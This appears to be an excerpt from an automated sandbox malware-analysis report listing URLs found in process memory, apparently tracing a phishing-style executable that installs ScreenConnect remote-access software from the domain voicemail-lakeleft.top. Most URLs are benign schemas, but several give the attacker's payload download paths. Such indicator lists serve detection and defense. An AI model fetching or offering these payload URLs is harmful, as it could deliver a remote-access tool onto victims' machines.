0000000E.00000003.1945681014.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890597917.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1912708788.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929278264.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857088725.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874058215.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837663842.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837784115.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945445109.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000000E.00000003.1914301366.000002094ED0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdC
                  Source: svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsAAAA
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                  Source: svchost.exe, 0000000E.00000002.3157558612.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837600169.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857195324.000002094ED08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874189629.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914239278.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945681014.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890597917.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1912708788.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929278264.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857088725.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874058215.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837663842.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837784115.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945445109.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000000E.00000003.1914301366.000002094ED0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdTz
                  Source: svchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsTz
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.3174278141.000001E8CC3FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 0000000E.00000002.3158220210.000002094F281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157944399.000002094F200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155699966.000002094E483000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156686908.000002094E4EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 0000000E.00000003.1874139847.000002094F233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueure
                  Source: svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustn
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.3158058619.00000000017D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B414C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.C
                  Source: dfsvc.exe, 00000001.00000002.3176169925.000001E8CDE00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.000000000129F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.0000000001331000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570200570.000000001BAC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569247081.0000000001764000.00000004.00000020.00020000.00000000.sdmp, S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDEBF000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570147020.000000001BA61000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570020021.000000001BA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application.6ZZfsA
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1570346922.000000001BAF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&
                  Source: S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapt
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllPx
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest-
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dllu#
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll
